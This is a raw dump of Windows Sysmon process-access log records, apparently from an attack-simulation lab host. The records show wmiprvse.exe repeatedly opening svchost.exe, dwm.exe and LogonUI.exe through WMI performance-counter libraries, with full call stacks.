21:47:42.337{39BD8DE3-3FF8-60CA-FA06-00000000D101}54281032C:\Windows\system32\wbem\wmiprvse.exe{39BD8DE3-0F65-60CA-1500-00000000D101}1132C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c669|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c71b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2fde|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b9e|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2659|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+1607|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Windows\SYSTEM32\pdh.dll+63ec|C:\Windows\SYSTEM32\pdh.dll+68a6|C:\Windows\SYSTEM32\pdh.dll+4e20|C:\Windows\SYSTEM32\pdh.dll+4195|C:\Windows\System32\wbem\WmiPerfClass.dll+10b52|C:\Windows\System32\wbem\WmiPerfClass.dll+100c9|C:\Windows\System32\wbem\WmiPerfClass.dll+3531|C:\Windows\System32\wbem\WmiPerfClass.dll+42d2|C:\Windows\System32\wbem\WmiPerfClass.dll+26b1|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000151862Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:47:42.337{39BD8DE3-3FF8-60CA-FA06-00000000D101}54281032C:\Windows\system32\wbem\wmiprvse.exe{39BD8DE3-0F65-60CA-1400-00000000D101}736C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3b59|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+414d|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+d007|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cb01|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f5e|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+27fe|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+1607|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Windows\SYSTEM32\pdh.dll+63ec|C:\Windows\SYSTEM32\pdh.dll+68a6|C:\Windows\SYSTEM32\pdh.dll+4e20|C:\Windows\SYSTEM32\pdh.dll+4195|C:\Windows\System32\wbem\WmiPerfClass.dll+10b52|C:\Windows\System32\wbem\WmiPerfClass.dll+100c9|C:\Windows\System32\wbem\WmiPerfClass.dll+3531|C:\Windows\System32\wbem\WmiPerfClass.dll+42d2|C:\Windows\System32\wbem\WmiPerfClass.dll+26b1|C:\Windows\System32\KERNEL32.DLL+84d4 10341000x8000000000000000151861Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:47:42.337{39BD8DE3-3FF8-60CA-FA06-00000000D101}54281032C:\Windows\system32\wbem\wmiprvse.exe{39BD8DE3-0F65-60CA-1400-00000000D101}736C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c669|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c71b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2fde|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b9e|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2659|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+1607|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Windows\SYSTEM32\pdh.dll+63ec|C:\Windows\SYSTEM32\pdh.dll+68a6|C:\Windows\SYSTEM32\pdh.dll+4e20|C:\Windows\SYSTEM32\pdh.dll+4195|C:\Windows\System32\wbem\WmiPerfClass.dll+10b52|C:\Windows\System32\wbem\WmiPerfClass.dll+100c9|C:\Windows\System32\wbem\WmiPerfClass.dll+3531|C:\Windows\System32\wbem\WmiPerfClass.dll+42d2|C:\Windows\System32\wbem\WmiPerfClass.dll+26b1|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000151860Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:47:42.337{39BD8DE3-3FF8-60CA-FA06-00000000D101}54281032C:\Windows\system32\wbem\wmiprvse.exe{39BD8DE3-0F65-60CA-1300-00000000D101}1008C:\Windows\System32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3b59|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+414d|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+d007|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cb01|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f5e|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+27fe|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+1607|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Windows\SYSTEM32\pdh.dll+63ec|C:\Windows\SYSTEM32\pdh.dll+68a6|C:\Windows\SYSTEM32\pdh.dll+4e20|C:\Windows\SYSTEM32\pdh.dll+4195|C:\Windows\System32\wbem\WmiPerfClass.dll+10b52|C:\Windows\System32\wbem\WmiPerfClass.dll+100c9|C:\Windows\System32\wbem\WmiPerfClass.dll+3531|C:\Windows\System32\wbem\WmiPerfClass.dll+42d2|C:\Windows\System32\wbem\WmiPerfClass.dll+26b1|C:\Windows\System32\KERNEL32.DLL+84d4 10341000x8000000000000000151859Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:47:42.337{39BD8DE3-3FF8-60CA-FA06-00000000D101}54281032C:\Windows\system32\wbem\wmiprvse.exe{39BD8DE3-0F65-60CA-1300-00000000D101}1008C:\Windows\System32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c669|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c71b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2fde|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b9e|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2659|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+1607|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Windows\SYSTEM32\pdh.dll+63ec|C:\Windows\SYSTEM32\pdh.dll+68a6|C:\Windows\SYSTEM32\pdh.dll+4e20|C:\Windows\SYSTEM32\pdh.dll+4195|C:\Windows\System32\wbem\WmiPerfClass.dll+10b52|C:\Windows\System32\wbem\WmiPerfClass.dll+100c9|C:\Windows\System32\wbem\WmiPerfClass.dll+3531|C:\Windows\System32\wbem\WmiPerfClass.dll+42d2|C:\Windows\System32\wbem\WmiPerfClass.dll+26b1|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000151858Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:47:42.337{39BD8DE3-3FF8-60CA-FA06-00000000D101}54281032C:\Windows\system32\wbem\wmiprvse.exe{39BD8DE3-0F65-60CA-1200-00000000D101}960C:\Windows\System32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3b59|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+414d|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+d007|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cb01|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f5e|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+27fe|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+1607|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Windows\SYSTEM32\pdh.dll+63ec|C:\Windows\SYSTEM32\pdh.dll+68a6|C:\Windows\SYSTEM32\pdh.dll+4e20|C:\Windows\SYSTEM32\pdh.dll+4195|C:\Windows\System32\wbem\WmiPerfClass.dll+10b52|C:\Windows\System32\wbem\WmiPerfClass.dll+100c9|C:\Windows\System32\wbem\WmiPerfClass.dll+3531|C:\Windows\System32\wbem\WmiPerfClass.dll+42d2|C:\Windows\System32\wbem\WmiPerfClass.dll+26b1|C:\Windows\System32\KERNEL32.DLL+84d4 10341000x8000000000000000151857Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:47:42.337{39BD8DE3-3FF8-60CA-FA06-00000000D101}54281032C:\Windows\system32\wbem\wmiprvse.exe{39BD8DE3-0F65-60CA-1200-00000000D101}960C:\Windows\System32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c669|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c71b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2fde|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b9e|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2659|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+1607|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Windows\SYSTEM32\pdh.dll+63ec|C:\Windows\SYSTEM32\pdh.dll+68a6|C:\Windows\SYSTEM32\pdh.dll+4e20|C:\Windows\SYSTEM32\pdh.dll+4195|C:\Windows\System32\wbem\WmiPerfClass.dll+10b52|C:\Windows\System32\wbem\WmiPerfClass.dll+100c9|C:\Windows\System32\wbem\WmiPerfClass.dll+3531|C:\Windows\System32\wbem\WmiPerfClass.dll+42d2|C:\Windows\System32\wbem\WmiPerfClass.dll+26b1|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000151856Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:47:42.337{39BD8DE3-3FF8-60CA-FA06-00000000D101}54281032C:\Windows\system32\wbem\wmiprvse.exe{39BD8DE3-0F65-60CA-1100-00000000D101}968C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3b59|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+414d|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+d007|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cb01|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f5e|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+27fe|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+1607|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Windows\SYSTEM32\pdh.dll+63ec|C:\Windows\SYSTEM32\pdh.dll+68a6|C:\Windows\SYSTEM32\pdh.dll+4e20|C:\Windows\SYSTEM32\pdh.dll+4195|C:\Windows\System32\wbem\WmiPerfClass.dll+10b52|C:\Windows\System32\wbem\WmiPerfClass.dll+100c9|C:\Windows\System32\wbem\WmiPerfClass.dll+3531|C:\Windows\System32\wbem\WmiPerfClass.dll+42d2|C:\Windows\System32\wbem\WmiPerfClass.dll+26b1|C:\Windows\System32\KERNEL32.DLL+84d4 10341000x8000000000000000151855Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:47:42.337{39BD8DE3-3FF8-60CA-FA06-00000000D101}54281032C:\Windows\system32\wbem\wmiprvse.exe{39BD8DE3-0F65-60CA-1100-00000000D101}968C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c669|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c71b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2fde|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b9e|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2659|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+1607|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Windows\SYSTEM32\pdh.dll+63ec|C:\Windows\SYSTEM32\pdh.dll+68a6|C:\Windows\SYSTEM32\pdh.dll+4e20|C:\Windows\SYSTEM32\pdh.dll+4195|C:\Windows\System32\wbem\WmiPerfClass.dll+10b52|C:\Windows\System32\wbem\WmiPerfClass.dll+100c9|C:\Windows\System32\wbem\WmiPerfClass.dll+3531|C:\Windows\System32\wbem\WmiPerfClass.dll+42d2|C:\Windows\System32\wbem\WmiPerfClass.dll+26b1|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000151854Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:47:42.337{39BD8DE3-3FF8-60CA-FA06-00000000D101}54281032C:\Windows\system32\wbem\wmiprvse.exe{39BD8DE3-0F65-60CA-1000-00000000D101}940C:\Windows\system32\dwm.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3b59|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+414d|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+d007|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cb01|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f5e|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+27fe|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+1607|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Windows\SYSTEM32\pdh.dll+63ec|C:\Windows\SYSTEM32\pdh.dll+68a6|C:\Windows\SYSTEM32\pdh.dll+4e20|C:\Windows\SYSTEM32\pdh.dll+4195|C:\Windows\System32\wbem\WmiPerfClass.dll+10b52|C:\Windows\System32\wbem\WmiPerfClass.dll+100c9|C:\Windows\System32\wbem\WmiPerfClass.dll+3531|C:\Windows\System32\wbem\WmiPerfClass.dll+42d2|C:\Windows\System32\wbem\WmiPerfClass.dll+26b1|C:\Windows\System32\KERNEL32.DLL+84d4 10341000x8000000000000000151853Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:47:42.337{39BD8DE3-3FF8-60CA-FA06-00000000D101}54281032C:\Windows\system32\wbem\wmiprvse.exe{39BD8DE3-0F65-60CA-1000-00000000D101}940C:\Windows\system32\dwm.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c669|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c71b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2fde|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b9e|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2659|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+1607|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Windows\SYSTEM32\pdh.dll+63ec|C:\Windows\SYSTEM32\pdh.dll+68a6|C:\Windows\SYSTEM32\pdh.dll+4e20|C:\Windows\SYSTEM32\pdh.dll+4195|C:\Windows\System32\wbem\WmiPerfClass.dll+10b52|C:\Windows\System32\wbem\WmiPerfClass.dll+100c9|C:\Windows\System32\wbem\WmiPerfClass.dll+3531|C:\Windows\System32\wbem\WmiPerfClass.dll+42d2|C:\Windows\System32\wbem\WmiPerfClass.dll+26b1|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000151852Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:47:42.337{39BD8DE3-3FF8-60CA-FA06-00000000D101}54281032C:\Windows\system32\wbem\wmiprvse.exe{39BD8DE3-0F65-60CA-0F00-00000000D101}928C:\Windows\System32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3b59|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+414d|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+d007|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cb01|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f5e|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+27fe|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+1607|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Windows\SYSTEM32\pdh.dll+63ec|C:\Windows\SYSTEM32\pdh.dll+68a6|C:\Windows\SYSTEM32\pdh.dll+4e20|C:\Windows\SYSTEM32\pdh.dll+4195|C:\Windows\System32\wbem\WmiPerfClass.dll+10b52|C:\Windows\System32\wbem\WmiPerfClass.dll+100c9|C:\Windows\System32\wbem\WmiPerfClass.dll+3531|C:\Windows\System32\wbem\WmiPerfClass.dll+42d2|C:\Windows\System32\wbem\WmiPerfClass.dll+26b1|C:\Windows\System32\KERNEL32.DLL+84d4 10341000x8000000000000000151851Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:47:42.337{39BD8DE3-3FF8-60CA-FA06-00000000D101}54281032C:\Windows\system32\wbem\wmiprvse.exe{39BD8DE3-0F65-60CA-0F00-00000000D101}928C:\Windows\System32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c669|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c71b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2fde|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b9e|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2659|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+1607|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Windows\SYSTEM32\pdh.dll+63ec|C:\Windows\SYSTEM32\pdh.dll+68a6|C:\Windows\SYSTEM32\pdh.dll+4e20|C:\Windows\SYSTEM32\pdh.dll+4195|C:\Windows\System32\wbem\WmiPerfClass.dll+10b52|C:\Windows\System32\wbem\WmiPerfClass.dll+100c9|C:\Windows\System32\wbem\WmiPerfClass.dll+3531|C:\Windows\System32\wbem\WmiPerfClass.dll+42d2|C:\Windows\System32\wbem\WmiPerfClass.dll+26b1|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000151850Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:47:42.337{39BD8DE3-3FF8-60CA-FA06-00000000D101}54281032C:\Windows\system32\wbem\wmiprvse.exe{39BD8DE3-0F65-60CA-0E00-00000000D101}880C:\Windows\system32\LogonUI.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3b59|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+414d|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+d007|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cb01|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f5e|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+27fe|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+1607|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Windows\SYSTEM32\pdh.dll+63ec|C:\Windows\SYSTEM32\pdh.dll+68a6|C:\Windows\SYSTEM32\pdh.dll+4e20|C:\Windows\SYSTEM32\pdh.dll+4195|C:\Windows\System32\wbem\WmiPerfClass.dll+10b52|C:\Windows\System32\wbem\WmiPerfClass.dll+100c9|C:\Windows\System32\wbem\WmiPerfClass.dll+3531|C:\Windows\System32\wbem\WmiPerfClass.dll+42d2|C:\Windows\System32\wbem\WmiPerfClass.dll+26b1|C:\Windows\System32\KERNEL32.DLL+84d4 10341000x8000000000000000151849Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:47:42.337{39BD8DE3-3FF8-60CA-FA06-00000000D101}54281032C:\Windows\system32\wbem\wmiprvse.exe{39BD8DE3-0F65-60CA-0E00-00000000D101}880C:\Windows\system32\LogonUI.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c669|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c71b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2fde|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b9e|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2659|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+1607|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Windows\SYSTEM32\pdh.dll+63ec|C:\Windows\SYSTEM32\pdh.dll+68a6|C:\Windows\SYSTEM32\pdh.dll+4e20|C:\Windows\SYSTEM32\pdh.dll+4195|C:\Windows\System32\wbem\WmiPerfClass.dll+10b52|C:\Windows\System32\wbem\WmiPerfClass.dll+100c9|C:\Windows\System32\wbem\WmiPerfClass.dll+3531|C:\Windows\System32\wbem\WmiPerfClass.dll+42d2|C:\Windows\System32\wbem\WmiPerfClass.dll+26b1|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000151848Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:47:42.337{39BD8DE3-3FF8-60CA-FA06-00000000D101}54281032C:\Windows\system32\wbem\wmiprvse.exe{39BD8DE3-0F64-60CA-0D00-00000000D101}788C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3b59|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+414d|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+d007|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cb01|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f5e|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+27fe|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+1607|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Windows\SYSTEM32\pdh.dll+63ec|C:\Windows\SYSTEM32\pdh.dll+68a6|C:\Windows\SYSTEM32\pdh.dll+4e20|C:\Windows\SYSTEM32\pdh.dll+4195|C:\Windows\System32\wbem\WmiPerfClass.dll+10b52|C:\Windows\System32\wbem\WmiPerfClass.dll+100c9|C:\Windows\System32\wbem\WmiPerfClass.dll+3531|C:\Windows\System32\wbem\WmiPerfClass.dll+42d2|C:\Windows\System32\wbem\WmiPerfClass.dll+26b1|C:\Windows\System32\KERNEL32.DLL+84d4 10341000x8000000000000000151847Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 